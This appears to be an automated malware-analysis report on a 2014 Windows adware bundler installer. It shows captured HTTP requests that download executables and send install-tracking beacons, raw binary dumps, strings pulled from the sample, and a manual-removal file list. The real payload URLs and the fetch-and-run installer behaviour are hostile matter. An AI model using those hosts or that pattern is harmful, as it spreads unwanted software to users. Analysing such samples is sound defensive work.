U[K...y`xN%.H5....-..E..|2..9.........6d..TS ..x_..w.V.....,....b..f.(
...........#....lu...e.=(x..)...8.V...'B...P......K| ..h.eZ8.z..)..q..
..r.(........ ...V.;"...-......d.,_ ....K.....q.e.)u.x...Q`(../.....-.
..}..n..V9a......e.....X..G.*l0Zs.........O^.e.d..... $../H...$......\
.b3B0..b...e8..l.l.e.Jjo....x Y..).... ..4...bs...4]x.q.KC......@.
<<< skipped >>>


GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<og7x..dx
..dx..d>_.dd..dqv.dy..d>_.d)..d>_.d...dqv.du..dx..d...du\.dq.
.du\.dy..du\.dy..dRichx..d........PE..L.....;T.................r...j..
[email protected]............@...........
..........................d....p..........................\...........
............................@.........................................
...text....p.......r.................. ..`.rdata..X............v......
........@[email protected][email protected]
[email protected]......................@[email protected]..
\[email protected]......................................
......................................................................
......................................................................
......................................................................
........................................................U..Q3..E...]..
..U.....V..c...]..U..Q3..E...]....U.....W......h..U...k.....].....U...
..W......h..U..ik.....].....U.....W......h..U..Ik.....].....U..j....W.
.....]................U..j....W..a...]................U..j....W..A...]
................U..j....W..!...]................U..Q3..E...]....U..Q3.
.E...]....U..hp.B.h..B.h....j.h..W......h..U..xj.....]....U..h..W...aX
......h..U..Tj.....]................U..h. X...aX......h..U..$j.....]..
..............U..h..X..paX..n...h..U...i.....]................U..h
<<< skipped >>>


GET /debug/Version/4_0_6_30/Nsis/Start HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:34 GMT
Server: Apache
Set-Cookie: vsid=905vr1614042946610931; expires=Sun, 20-Oct-2019 02:31:34 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'" 
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i1.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i3.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
 130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i2.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff; 
font-weight:bold; line-height:40px; text-transform:capitalize}...c
<<< skipped >>>


GET /debug/Version/4_0_6_30/Nsis/PreRun HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:37 GMT
Server: Apache
Set-Cookie: vsid=926vr1614042979420107; expires=Sun, 20-Oct-2019 02:31:37 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'" 
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i3.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i3.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
 130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i2.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff; 
font-weight:bold; line-height:40px; text-transform:capitalize}...c
<<< skipped >>>


GET /test.html HTTP/1.1
Host: api.v2.sslsecure3.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=913vr1614043167216346; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: files.uniblue.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: NNkBvtCrRII36SrsAPAV9S8E22WW0HFAgJZbt5Jcwc9QUjK6ZG2S608Vfv7ij9WL
x-amz-request-id: 27AD26F1F1EBA713
Date: Tue, 21 Oct 2014 02:32:19 GMT
x-amz-meta-built_from_package_id: 23466
x-amz-meta-built_from_package_version: 84
Cache-Control: max-age 86400,public
Last-Modified: Fri, 10 Oct 2014 19:53:33 GMT
ETag: "7ddda0daedd1ef875325bad41071317a"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1294552
Server: AmazonS3
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....WZR............
.........D............... ....@.......................................
.......@......................................,%..........X...........
......................................................................
...............text...,........................... ..`.itext..D.......
.................... ..`.data........ [email protected]..
...V...0...........................idata..............................
@....tls.....................................rdata....................
..........@[email protected]...,%.......&... ..............@..@................
....................@..@..............................................
......................................................................
[email protected]............
@...string([email protected]......@...............................@.....
.... 9@.([email protected]@[email protected]@[email protected]@..9@.,[email protected]@[email protected].%..A....%..A.
...%..A....%..A....%..A....%..A....%(.A....%..A....%$.A....%..A....%..
A....%..A....%..A....%..A....%|.A....%x.A....%t.A....%p.A....%l.A....%
h.A....% .A....%d.A....%`.A....%\.A....%..A....%..A....%..A....%X.A...
.%T.A....%..A....%..A....%..A....%P.A....%L.A....%H.A....%D.A....%@.A.
..S..........$D...T.J....D$,.t...\$0....D[..@..%<.A....%8.A....
<<< skipped >>>


GET /debug/Version/4_0_6_30/Nsis/CopyFiles HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:36 GMT
Server: Apache
Set-Cookie: vsid=916vr1614042962527815; expires=Sun, 20-Oct-2019 02:31:36 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'" 
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i3.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i4.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
 130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i2.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff; 
font-weight:bold; line-height:40px; text-transform:capitalize}...c
<<< skipped >>>


GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
2215...............r..q...*..D.;R.I.....*.9.`C....y...CbV .......6o.T%
O.7.'...>gf..k..l.....s.....t....?>N....]o.\U.}.W.z.............
.go4.s:..G..K..~..w.*...{1 W..X..q.z...Y]..b]...(W...u...v.?.g..?..wo.
.I..w/6.f./^.../g.m.l.d..........^g.......O...e.M.......6....:.R.9..o^
/~.......,..../~...7.*...\..{..@h=..|...zSmg..N..f.......N.m...q.riw..
....j.I....(.V..*_...&....$N..6y.oy..Vy.h.v=...6.".E`y}.W'o^k....o[..&
gt;...s..K..|....r...."(../..r.?..].. v$..\....I.%.Gx.[....b....` ...p
mQ,s..J..]gweUl.nSV.(..Z.....b..v_.t)./6....u*..9EB...v.WG..En.r...Y^.
Y.....Yg...m.Y....V"( ....6.....s..<0V....\.&.3...^B.?o..3[...;.^3.
/.Te..|..7...i..?l.*...?..f.z..f.Z2..[..:...........v.,f...H/.....^~_.
....w.O?.Ww..~..W.M...5.X......#.........>..G..)'|........_-.l.....
.o.:........f.[=\j..u.....c....a...z....;$.Lz`w.1..l..,V..v..^m.OttY..
...`n...>J..zs.......m....Js..v.r/.......C.nWs.b.55<Jn.M..n..#..
.Y...Q".*..G...)..\.zs..LAF..O?.g...].{@....j....%......X....*/._q..[.
..l......a.]V,. ......oW....._.wI^s._Q............l.,...y9...x......l.
WI......|H^.P....oZ.s.....3....HUN.)L..>.bc.2.A.@,.R..np6"......A..
L...TGZ....e.x..:..S./.....eYeI.u.....A.Dy.......`o..z.E...*....a.....
.;.g5._......f.'...3#..v'M..<...!Vsx.B...Q..~d..V.{.7..........D.!.
[email protected].$!hf-.pL...H..!....|......J..]V.....-.....{.. ..*.
j ...p.5....E2I...9Q.9t...P. [email protected][email protected].......:..Eb.G.%
....RQq..k0...3.........0C..I......7..>H........:)...p...'....l..G.
..a......#....I2z.\L...|..&i2.....~..g...........7<K.|L.i2N....
<<< skipped >>>


GET //Displays/Softwares/9103144e_display (1).html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: text/html
Last-Modified: Tue, 01 Jul 2014 09:28:50 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
2215...............r..q...*..D.;R.I.....*.9.`C....y...CbV .......6o.T%
O.7.'...>gf..k..l.....s.....t....?>N....]o.\U.}.W.z.............
.go4.s:..G..K..~..w.*...{1 W..X..q.z...Y]..b]...(W...u...v.?.g..?..wo.
.I..w/6.f./^.../g.m.l.d..........^g.......O...e.M.......6....:.R.9..o^
/~.......,..../~...7.*...\..{..@h=..|...zSmg..N..f.......N.m...q.riw..
....j.I....(.V..*_...&....$N..6y.oy..Vy.h.v=...6.".E`y}.W'o^k....o[..&
gt;...s..K..|....r...."(../..r.?..].. v$..\....I.%.Gx.[....b....` ...p
mQ,s..J..]gweUl.nSV.(..Z.....b..v_.t)./6....u*..9EB...v.WG..En.r...Y^.
Y.....Yg...m.Y....V"( ....6.....s..<0V....\.&.3...^B.?o..3[...;.^3.
/.Te..|..7...i..?l.*...?..f.z..f.Z2..[..:...........v.,f...H/.....^~_.
....w.O?.Ww..~..W.M...5.X......#.........>..G..)'|........_-.l.....
.o.:........f.[=\j..u.....c....a...z....;$.Lz`w.1..l..,V..v..^m.OttY..
...`n...>J..zs.......m....Js..v.r/.......C.nWs.b.55<Jn.M..n..#..
.Y...Q".*..G...)..\.zs..LAF..O?.g...].{@....j....%......X....*/._q..[.
..l......a.]V,. ......oW....._.wI^s._Q............l.,...y9...x......l.
WI......|H^.P....oZ.s.....3....HUN.)L..>.bc.2.A.@,.R..np6"......A..
L...TGZ....e.x..:..S./.....eYeI.u.....A.Dy.......`o..z.E...*....a.....
.;.g5._......f.'...3#..v'M..<...!Vsx.B...Q..~d..V.{.7..........D.!.
[email protected].$!hf-.pL...H..!....|......J..]V.....-.....{.. ..*.
j ...p.5....E2I...9Q.9t...P. [email protected][email protected].......:..Eb.G.%
....RQq..k0...3.........0C..I......7..>H........:)...p...'....l..G.
..a......#....I2z.\L...|..&i2.....~..g...........7<K.|L.i2N....
<<< skipped >>>


GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:22 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes
PK........YE.D...=....=.......browserapp.css.S.N.1.='R.aJ......j.\@TH\
z.U........l.."...I..JI.:....y...}U..:.p...- Nf....n....U......q...ki.
(-u..0.>V}8..A.....w_......\'GF.H....?.4.:..e..}?.X.Y....E..._L..&g
t;..!..... .......C...R(,/...o.Hx.p.B....s.. ..0KY.=s.'...m...o..8}..F
d.$....b...... b....Y>..<&...%...Jjd....p...XQK.g... ...F.......
fp.E..7S>b......"..>.it.W......k..4.E....,).<...H.dk....p.d..
...^..'....=.U.v3Q5L......6B...//l.....^........R..t^...fp<I.!....E
b...G............#`/.../PK.........k3C................images/PK.......
...YE.D...=....=.....$....... .......browserapp.css.. ................
.\.5.....\.5.....PK...........k3C..............$...............images/
.. .........x..,3.....7.......7.....PK......................







The Application connects to the servers at the folowing location(s):







%original file name%.exe_940:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe" /path="c:\%original file name%.exe" ""
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp\nsisdl.dll
f718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe->C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp
4a5df93e68ff718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
f718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe
f.lXs
.nIrR
<add key="UseElevatedPermissions" value="0" />
<system.net>
<httpWebRequest useUnsafeHeaderParsing="true"/>
</system.net>
<system.web>
<httpRuntime maxRequestLength="19000"/>
<webServices>
<add name="HttpGet"/>
<add name="HttpPost"/>
</webServices>
</system.web>
<supportedRuntime version="v2.0.50727"/>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/>
v2.0.50727
setup.exe
CallUrl
.ctor
System.Resources
System.Reflection
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.IO
System.Net
WebRequest
HttpWebRequest
IWebProxy
get_DefaultWebProxy
WebResponse
HttpWebResponse
Password
<PrivateImplementationDetails>{B9D36289-C9B1-42FE-A2FC-62AE8DAAE9F9}
System.Security.Cryptography
PasswordDeriveBytes
set_Key
4.0.6.30
$a7de9600-ff8a-4d28-a544-9eaad1f27abc
_CorExeMain
mscoree.dll
.6M%u_T(
%original file name%.exe
B50A97~1.EXE
718db1e70c.exe\e5d39da6f3e34d49a99c04aec898786a\parent.txt
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nswB5.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshB4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0a1</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
be393027e81a4b88b52679c3751607ae.txt






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    mscorsvw.exe:172
    spidentifierimpl.exe:528
    %original file name%.exe:940
    

    2. 

  2. Delete the original Application file.
    3. 

  3. Delete or disinfect the following files created/modified by the Application:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (180359 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\close.html (384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\BingHP4info.dfe (740 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo3.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser app shoppinginfo.dfe (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton_xl.jpg (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo2.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\less.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton.jpg (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesisinfo.dfe (712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.png (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\box.html (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2A.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check-close.png (243 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9U0U7603\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\group.html (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\TheBestDeals\info.html (1323 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\finish.html (299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\45UV0H2Z\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app_obv.jpg (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\mypcbackup.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\browserapp.css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\style.css (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\BingHP4\info.html (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\mypcbackup.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\percentage-bg.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\jquery.min.js (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe (89955 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris.png (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPUB4PUN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-icon.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis 2\info.html (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo2.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butpause.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesis 2info.dfe (712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser appinfo.dfe (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\MyBackupPcinfo.dfe (611 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app shopping\info.html (1251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\MyBackupPc\info.html (1106 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WL2B4963\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\more.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\vuupc.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-small.png (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\options.html (965 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress.png (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\genesis.css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateDisplays.dfe (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3B.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris-small.png (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\TheBestDealsinfo.dfe (750 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\instalando.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-shortw.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3C.css (638 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2C.css (578 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateStyle.dfe (4069 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\welcome.html (151 bytes)
